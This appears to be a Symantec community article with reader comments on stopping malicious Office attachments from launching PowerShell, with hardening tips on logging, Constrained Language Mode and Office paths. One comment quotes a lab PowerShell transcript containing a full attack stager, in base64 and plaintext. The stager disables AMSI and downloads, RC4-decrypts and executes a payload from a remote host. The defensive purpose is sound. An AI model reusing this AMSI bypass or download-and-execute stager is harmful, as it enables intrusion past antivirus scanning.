Microsoft’s PowerShell has lately been a tool of choice for malware distributors- the trend has only increased since December 2016’s white paper PowerShell threats surge: 95.4 percent of analyzed scripts were malicious. Too often, end users tricked into opening a malicious attachment will find this powerful tool turned against them. The ultimate payload downloaded by PowerShell is usually Ransomware. Once downloaded and run:
***** YOUR FILES HAVE BEING ENCRYPTED *****
Now your organization’s data is lost, unless you have a healthy backup.
Application And Device Control: An Excellent Extra Line of Defense
Using Symantec Endpoint Protection’s optional Application And Device Control component, it is possible to prevent malicious Word, Excel or other Office document attachments from accessing PowerShell or cmd. Here’s a guide illustrating how to craft such a policy yourself….
Or, find the attached policy that can be implemented and tested in your environment. Please note that this “Blocking PowerShell.dat” file is provided “as is.” We strongly recommend that it be trialed first in a controlled test environment before applying the policy throughout the organization! Also note that this is one extra layer of defense- it further reduces the risk f a malware infection, but cannot guarantee eliminating all possibility of damage.
More MUST READ Articles and Documents
Hardening Your Environment Against Ransomware
https://www.symantec.com/connect/articles/hardening-your-environment-against-ransomware
Support Perspective: W97M.Downloader Battle Plan
https://www.symantec.com/connect/articles/support-perspective-w97mdownloader-battle-plan
REPORT: Organizations must respond to increasing threat of ransomware
https://www.symantec.com/connect/blogs/report-organizations-must-respond-increasing-threat-ransomware
Ransomware removal and protection with Symantec Endpoint Protection
https://support.symantec.com/en_US/article.HOWTO124710.html
Best Practices for Deploying Symantec Endpoint Protection's Application and Device Control Policies http://www.symantec.com/docs/TECH145973
So many Thanks to mick2009 from reviewing this article!
You could do this over ADC, but if the clients are connected to an AD, you can also setup a GPO which records the PS command in a high detail.
GPO: Computer Configuration => Administrative Templates => Windows Components => Windows PowerShell
Log location is a Netshare within your environment.
Example from a proofground environment for a mimikaz recording:
********************** Windows PowerShell transcript start Start time: 20170725143617 Username: WIN10\ADMIN RunAs User: WIN10\ADMIN Machine: WIN10 (Microsoft Windows NT 10.0.14393.0) Host Application: powershell -noP -sta -w 1 -enc WwBSAEUAZgBdAC4AQQBTAHMARQBNAGIAbAB5AC4ARwBlAFQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBMAHUAZQAoACQAbgBVAEwAbAAsACQAVABSAHUAZQApAH0AOwBbAFMAWQBTAHQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBhAGcAZQByAF0AOgA6AEUAeABwAGUAYwBUADEAMAAwAEMAbwBuAFQAaQBuAFUARQA9ADAAOwAkAHcAQwA9AE4ARQBXAC0ATwBiAEoARQBDAFQAIABTAFkAcwB0AEUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAEUAQQBkAEUAUgBzAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AEMALgBQAHIAbwB4AFkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAHQALgBXAGUAYgBSAEUAcQBVAEUAcwBUAF0AOgA6AEQAZQBGAGEAVQBMAHQAVwBFAEIAUAByAE8AWAB5ADsAJAB3AGMALgBQAFIATwBYAFkALgBDAHIARQBkAGUATgB0AEkAYQBsAFMAIAA9ACAAWwBTAFkAcwB0AGUAbQAuAE4ARQBUAC4AQwBSAGUAZABFAE4AdABpAGEAbABDAGEAQwBoAGUAXQA6ADoARABFAGYAQQB1AEwAVABOAEUAdABXAG8AcgBrAEMAcgBlAEQARQBOAHQASQBhAEwAUwA7ACQASwA9AFsAUwB5AFMAdABlAG0ALgBUAGUAWABUAC4ARQBOAEMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAeQBUAEUAcwAoACcANQBmADQAZABjAGMAMwBiADUAYQBhADcANgA1AGQANgAxAGQAOAAzADIANwBkAGUAYgA4ADgAMgBjAGYAOQA5ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABlAEEAZABFAFIAUwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ARQBlAHEANwBRAEsAbwA3AC8ARQBYADcAbwB1AFYAMQBLAFgAZgBFAGIAQQBTAEUARwBOAHMAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxADEANQAuADUAOgA4ADAAOAAwACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAGQAQQB0AEEAPQAkAFcAQwAuAEQATwB3AG4ATABvAGEAZABEAEEAdABhACgAJABTAEUAcgArACQAVAApADsAJABpAHYAPQAkAEQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAEQAYQB0AEEAWwA0AC4ALgAkAGQAYQB0AGEALgBMAGUATgBnAFQASABdADsALQBqAE8ASQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA== Process ID: 5772 PSVersion: 5.1.14393.0 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.0 BuildVersion: 10.0.14393.0 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20170725143617 ********************** PS>[REf].ASsEMbly.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFieLd('amsiInitFailed','NonPublic,Static').SetVALue($nULl,$TRue)};[SYStem.NeT.SErvIcEPOinTMAnager]::ExpecT100ConTinUE=0;$wC=NEW-ObJECT SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYstem.NET.CRedENtialCaChe]::DEfAuLTNEtWorkCreDENtIaLS;$K=[SyStem.TeXT.ENCOding]::ASCII.GETByTEs('5f4dcc3b5aa765d61d8327deb882cf99');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$WC.HeAdERS.ADd("Cookie","session=Eeq7QKo7/EX7ouV1KXfEbASEGNs=");$ser='http://192.168.115.5:8080';$t='/login/process.php';$dAtA=$WC.DOwnLoadDAta($SEr+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX ********************** Command start time: 20170725143617 ********************** PS>TerminatingError(): "Specified method is not supported." Specified method is not supported. [REf].ASsEMbly.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFieLd('amsiInitFailed','NonPublic,Static ').SetVALue($nULl,$TRue)};[SYStem.NeT.SErvIcEPOinTMAnager]::ExpecT100ConTinUE=0;$wC=NEW-ObJECT SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYs tem.NET.CRedENtialCaChe]::DEfAuLTNEtWorkCreDENtIaLS;$K=[SyStem.TeXT.ENCOding]::ASCII.GETByTEs('5f4dcc3b5aa765d61d8327de b882cf99');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=( $I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$WC.HeAdERS.ADd("Cookie","ses sion=Eeq7QKo7/EX7ouV1KXfEbASEGNs=");$ser='http://192.168.115.5:8080';$t='/login/process.php';$dAtA=$WC.DOwnLoadDAta($SE r+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX : Specified method is not supported. + CategoryInfo : NotImplemented: (:) [], PSNotSupportedException + FullyQualifiedErrorId : NotSupported
********************** Command start time: 20170725143617 ********************** PS>$global:? False ********************** Windows PowerShell transcript end End time: 20170725143617 **********************
I would also recommend to think about simple things like PS hardening over Environment variables. You could use a poor documented setting: Constrained Language Mode
Example:
HKLM\System\CurrentControlSet\Control\SESSIONMANAGER\Environment\ String: __PSLockdownPolicy Value: 4
Benefit: base64 attacks are no longer easy possible
Problem: Environment Variables can be deleted!
Sorry for bumping this old thread.
If we want to log every poweshell commands by leveraging SEP ADC, just put the running process as any? (*.exe ?)
You don't need the entire path in AC. You can just use winword.exe, powerpnt.exe and excel.exe without prefix..
Hi all,
thanks for sharing this. A more effective way to cover all installations and future updates of MS Office is to use the Registry link to the different components.
As example: #HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\Path#*\*
This would enable protection for MS PowerPoint for every installed version and bring the ADC rule into a static condition without the need to be reconfigured every time.
Please look also to this article: https://www.symantec.com/connect/blogs/defeat-powerware-using-sep-application-control-policies
Hope this helps.
T.
Hi Mithun, thanks for your comment. I believe that Office365 (web Word version) will not run a PowerShell script or a Macro. Only the Local installation will be able to access the PowerShell then ADC will trigger the action. We have to consider here any installation path variations:
Office 2013
Windows 32-bit: C:\Program Files\Microsoft Office\Office15\ Windows 64-bit: C:\Program Files (x86)\Microsoft Office\Office15\ 64-bit
Windows 64-bit: C:\Program Files\Microsoft Office\Office15\ Click-To-Run
Windows 32-bit: C:\Program Files\Microsoft Office 15\ClientX86\Root\Office15\ Windows 64-bit: C:\Program Files (x86)\Microsoft Office 15\ClientX64\Root\Office15\ Office 2016
32-bit
Windows 32-bit: C:\Program Files\Microsoft Office\root\Office16\ Windows 64-bit: C:\Program Files (x86)\Microsoft Office\root\Office16\ 64-bit
Windows 64-bit: C:\Program Files\Microsoft Office\root\Office16\ Click-To-Run
Windows 32-bit: C:\Program Files\Microsoft Office 16\ClientX86\Root\Office16\ Windows 64-bit: C:\Program Files (x86)\Microsoft Office 16\ClientX64\Root\Office16\
Hope that Helps!
Wonderful Article..!! This is going to assist a lot of Security Administrators to control the latest Threats arising from Office.
However, I am wondering if this rule would work with Office 365.
Lucas, Is there are way we would perform similar control on Office365?
My suggestion would be to set this rule to 'Test (log only)' as the default.
Absolutely TORB, I have worked with a customer which added the cmd and other process able to run scripts. As said in the article exaustive testing are required before enabling production. Thanks.